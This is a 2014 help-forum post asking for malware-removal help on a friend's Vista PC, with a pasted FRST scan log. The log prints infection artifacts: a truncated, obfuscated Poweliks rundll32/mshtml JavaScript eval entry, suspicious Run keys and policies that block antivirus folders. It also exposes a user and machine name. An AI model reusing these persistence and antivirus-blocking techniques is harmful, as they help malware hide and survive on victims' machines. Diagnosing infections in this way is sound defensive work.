jjoyner1985 Posted August 23, 2014 ID:870468 Share Posted August 23, 2014 Good afternoon, I have an infection on a friend's PC running Vista Home Premium 32-bit SP2 that is driving me to drink. I have tried to remove it myself using various tools but any progress I make is undone within minutes by this malware. So far, Combofix has listed a ZeroAccess rootkit that it has removed. MBAM has shown and allegedly removed 2 trojans. The first was a dropper.ed and agent.ed. The second one I don't remember the name of exactly. It was something along the lines of Milsap or some such. Chrome-like browser windows appear on their own with an IP address as the URL (one of which is from Scranton, PA I found out). The IPs cycle through in this order: 206.51.231.110, 66.197.157.20, 184.173.181.55 and operate under a process known as browser.exe. Each Chrome-like window stays up for a few seconds until the "unresponsive page" warning appears and the browser closes. It is followed by another soon after. Chrome itself is not installed on this computer. I followed the browser.exe process to the following directory: LocalLow/UIMobile/ValidatorVisual. Deleting either ValidatorVisual or UIMobile directories only fixes the issue until it regenerates. Upon deleting the UIMobile directory, the first file to return is titled JawaVinyl.pac, has a size of ~44,762KB, and is (given the extension) a proxy auto configuration file. On the various scans that I've run, some have pointed out that the computer is configured to use a proxy of the 127.0.0.1 port 5555. Looking at the connection settings under Internet Options, the computer is not configured to automatically detect nor use a hard-coded proxy. Per the sticky, here are the FRST.txt and Addition.txt logs. I have been working on this at work. So, any references to the proxy address of 192.168.0.101:3128 are legit, as that is my empoyer's CentOS web proxy. Thanks in advance for your help. FRST.txt Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:23-08-2014Ran by savas.kyriakidis (administrator) on SAVASKYRIAKI-PC on 23-08-2014 16:54:35Running from F:\Platform: Microsoft® Windows Vista™ Home Premium Service Pack 2 (X86) OS Language: English (United States)Internet Explorer Version 9Boot Mode: Normal The only official download link for FRST:Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ Download link from any site other than Bleeping Computer is unpermitted or outdated.See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe(Microsoft Corporation) C:\Windows\System32\SLsvc.exe(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe(Microsoft Corporation) C:\Windows\System32\wlanext.exe(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgfws.exe(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgwdsvc.exe(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE( ) C:\Windows\System32\lxblcoms.exe() C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe(Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe() C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgnsx.exe(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe(CyberLink Corp.) C:\Program Files\Dell\MediaDirect\PCMService.exe(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe(Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgtray.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe(Apple Inc.) C:\Program Files\QuickTime\QTTask.exe(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe(Microsoft Corporation) C:\Windows\ehome\ehtray.exe(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe(Microsoft Corporation) C:\Windows\System32\rundll32.exe(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acsagent.exe(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe() C:\Program Files\NETGEAR\WNA1100\WNA1100.exe(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE(Microsoft Corporation) C:\Windows\System32\rundll32.exe(Glarysoft Ltd) C:\Program Files\Glary Utilities 5\Integrator.exe(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\APSDaemon.exe(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe(Microsoft Corporation) C:\Windows\System32\taskmgr.exe(Microsoft Corporation) C:\Windows\System32\rundll32.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [ECenter] => C:\Dell\E-Center\EULALauncher.exe [17920 2008-02-29] ( )HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [4706304 2008-03-06] (Realtek Semiconductor)HKLM\...\Run: [startCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [90112 2006-11-10] ()HKLM\...\Run: [dscactivate] => C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe [16384 2008-03-11] ( )HKLM\...\Run: [PCMService] => C:\Program Files\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)HKLM\...\Run: [AppleSyncNotifier] => C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe [59240 2012-02-23] (Apple Inc.)HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard)HKLM\...\Run: [PMBVolumeWatcher] => C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe [599328 2010-03-24] (Sony Corporation)HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [997920 2011-06-15] (Microsoft Corporation)HKLM\...\Run: [AVG_TRAY] => C:\Program Files\AVG\AVG10\avgtray.exe [2338656 2011-09-10] (AVG Technologies CZ, s.r.o.)HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [153640 2009-06-03] (ActivIdentity)HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [400936 2009-06-03] (ActivIdentity)HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [379752 2012-11-02] (SolarWinds)HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTIONHKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTIONHKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTIONHKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTIONHKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTIONHKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTIONHKLM Group Policy restriction on software: C:\Program Files\Malwarebytes' Anti-Malware <====== ATTENTIONHKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\AVAST Software <====== ATTENTIONHKLM\...\Policies\Explorer: [useDefaultTile] 0HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [Akamai NetSession Interface] => C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [iCloudServices] => C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-10-31] (Apple Inc.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [com.apple.dav.bookmarks.daemon] => C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe [59720 2013-10-02] (Apple Inc.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ApplePhotoStreams] => C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-10-31] (Apple Inc.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [irfuqApivh] => regsvr32.exe "C:\ProgramData\IrfuqApivh\IrfuqApivh.dat"HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-08-17] (Glarysoft Ltd)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [uINoteworthy] => C:\Windows\system32\rundll32.exe "C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll",DllRegisterServer <===== ATTENTIONHKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [spybot-S&D Cleaning] => C:\Windows\dwrcs\Uploads\SpybotPortable\App\Spybot\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Policies\Explorer: [HideSCAHealth] 1HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\MountPoints2: F - F:\LaunchU3.exe -aHKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\MountPoints2: {0ae3004a-a5e2-11df-a1d1-00219b005b31} - H:\LaunchU3.exe -aHKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\MountPoints2: {a906d2bc-6084-11e3-9d8a-00219b005b31} - H:\LaunchU3.exe -aHKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\system: [DisableChangePassword] 0HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\system: [DisableLockWorkstation] 0HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\Explorer: [NoLogOff] 0HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\Explorer: [HideSCAHealth] 1HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\MountPoints2: F - F:\LaunchU3.exe -aHKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\MountPoints2: {0ae3004a-a5e2-11df-a1d1-00219b005b31} - H:\LaunchU3.exe -aHKU\S-1-5-21-3726736968-409882640-1958551794-501\...\Run: [swg] => "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"HKU\S-1-5-21-3726736968-409882640-1958551794-501\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)HKU\S-1-5-21-3726736968-409882640-1958551794-501\...\RunOnce: [spchecker] => C:\Program Files\AVG\AVG10\Notification\SPCheckerTE.exe [390472 2011-12-22] ()Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ActivClient Agent.lnkShortcutTarget: ActivClient Agent.lnk -> C:\Program Files\ActivIdentity\ActivClient\acsagent.exe (ActivIdentity)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnkShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnkShortcutTarget: Metacafe.lnk -> C:\$RECYCLE.BIN\S-1-5-21-3726736968-409882640-1958551794-1000\MetacafeAgent.exe (No File)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA1100 Smart Wizard.lnkShortcutTarget: NETGEAR WNA1100 Smart Wizard.lnk -> C:\Program Files\NETGEAR\WNA1100\WNA1100.exe ()Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnkShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnkShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnkShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnkShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnkShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnkShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnkShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnkShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)BootExecute: autocheck autochk * BootDefrag.exesasnative32 ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehpHKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xA02BBBD1D537CF01HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-usURLSearchHook: HKCU - (No Name) - {26842a09-ffa8-4e2c-ae12-0c80f01c3295} - No FileSearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)BHO: SSVHelper Class -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (Sun Microsystems, Inc.)BHO: CBrowserHelperObject Object -> {CA6319C0-31B7-401E-A518-A07C3DB8F777} -> C:\Program Files\Dell\BAE\BAE.dll (Dell Inc.)BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No FileDPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} http://www.winkflash.com/photo/loaders/ImageUploader5.cabDPF: {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cabDPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cabHandler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG10\avgpp.dll (AVG Technologies CZ, s.r.o.)Winsock: Catalog5 01 %SystemRoot%\System32\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 66.18.32.2 66.18.32.3 FireFox:========FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtensionFF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-06]FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2FF Extension: HP Smart Web Printing - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2010-09-02]FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG10\Firefox4FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG10\Firefox4 [2011-07-10]FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 Chrome: =======CHR HKLM\...\Chrome\Extension: [icmlaeflemplmjndnaapfdbbnpncnbda] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [] ========================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [207400 2009-06-03] (ActivIdentity)S3 AVG Security Toolbar Service; C:\Program Files\AVG\AVG10\Toolbar\ToolbarBroker.exe [167264 2011-11-10] ()R2 avgfws; C:\Program Files\AVG\AVG10\avgfws.exe [2708024 2011-03-09] (AVG Technologies CZ, s.r.o.)S2 AVGIDSAgent; C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe [7390560 2011-08-18] (AVG Technologies CZ, s.r.o.)R2 avgwd; C:\Program Files\AVG\AVG10\avgwdsvc.exe [269520 2011-02-08] (AVG Technologies CZ, s.r.o.)R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [161048 2008-04-28] (Stardock Corporation)R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [705384 2012-11-02] (SolarWinds)R3 hpqcxs08; C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll [217088 2008-10-16] (Hewlett-Packard Co.) [File not signed]R2 hpqddsvc; C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]R2 HPSLPSVC; C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL [634880 2008-10-16] (Hewlett-Packard Co.) [File not signed]S3 jswpsapi; C:\Program Files\NETGEAR\WNA1100\jswpsapi.exe [960992 2010-03-22] (Atheros Communications, Inc.)R2 lxbl_device; C:\Windows\system32\lxblcoms.exe [537520 2007-04-20] ( )R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2008-07-18] (Hewlett-Packard) [File not signed]S3 NisSrv; c:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)R2 PassThru Service; C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe [87040 2012-03-23] () [File not signed]R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2008-07-18] (Hewlett-Packard) [File not signed]R2 WSWNA1100; C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe [266240 2010-08-04] () [File not signed]S2 vToolbarUpdater; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\9.0.1\ToolbarUpdater.exe [X] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) S3 athur; C:\Windows\System32\DRIVERS\athur.sys [1439744 2010-10-10] (Atheros Communications, Inc.)R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [248656 2011-01-07] (AVG Technologies CZ, s.r.o.)R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [34896 2011-03-01] (AVG Technologies CZ, s.r.o.)R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [32592 2011-03-16] (AVG Technologies CZ, s.r.o.)R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [297168 2011-04-05] (AVG Technologies CZ, s.r.o.)R0 BootDefragDriver; C:\Windows\System32\drivers\BootDefragDriver.sys [16064 2014-07-18] (Glarysoft Ltd)S3 gfiark; C:\Windows\System32\drivers\gfiark.sys [43368 2013-05-23] (ThreatTrack Security)R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17216 2014-08-14] (Glarysoft Ltd)R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [110296 2014-08-23] (Malwarebytes Corporation)R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)S3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-03-06] (Windows ® Codename Longhorn DDK provider)R0 SCMNdisP; C:\Windows\System32\DRIVERS\scmndisp.sys [21728 2007-01-19] (Windows ® Codename Longhorn DDK provider)S3 USBAAPL; C:\Windows\System32\Drivers\usbaapl.sys [42496 2011-08-02] (Apple, Inc.) [File not signed]U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-20] (Microsoft Corporation)S1 AVGIDSDriver; system32\DRIVERS\avgidsdriverx.sys [X]S1 AVGIDSShim; system32\DRIVERS\avgidsshimx.sys [X]S3 catchme; \??\C:\ComboFix\catchme.sys [X]S3 IpInIp; system32\DRIVERS\ipinip.sys [X]S1 MpKslb9ee2848; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{BFB5F758-88DD-40A2-8570-9299F94880E8}\MpKslb9ee2848.sys [X]S1 MpKslbb89cfa8; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A306A4ED-0116-4B29-AE29-DC65EC41A044}\MpKslbb89cfa8.sys [X]S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]S3 SWDUMon; system32\DRIVERS\SWDUMon.sys [X]S3 TfNetMon; \??\C:\Windows\system32\drivers\TfNetMon.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-08-23 16:54 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST2014-08-23 16:30 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys2014-08-23 16:30 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware2014-08-23 16:30 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys2014-08-23 16:30 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys2014-08-23 16:30 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys2014-08-23 16:16 - 2014-08-23 16:16 - 00009460 _____ () C:\ComboFix.txt2014-08-23 12:25 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe2014-08-23 12:25 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe2014-08-23 12:25 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt2014-08-23 11:51 - 2014-08-23 11:53 - 00000000 ____D () C:\AdwCleaner2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT2014-08-23 11:23 - 2014-08-23 11:25 - 00001106 _____ () C:\Users\savas.kyriakidis\Desktop\Live PC Help.lnk2014-08-23 11:02 - 2014-08-23 11:05 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy2014-08-22 17:06 - 2013-09-04 14:57 - 00024040 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiutil.sys2014-08-22 17:06 - 2013-05-23 08:39 - 00043368 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiark.sys2014-08-22 17:05 - 2014-08-22 21:40 - 00000000 ____D () C:\VIPRERESCUE2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK2014-08-22 16:12 - 2014-08-23 16:20 - 00038790 _____ () C:\Windows\PFRO.log2014-08-22 15:52 - 2014-08-23 16:16 - 00000000 ____D () C:\Qoobox2014-08-22 14:32 - 2014-08-22 15:42 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy.BackupBySpybotPortable2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps2014-08-22 14:00 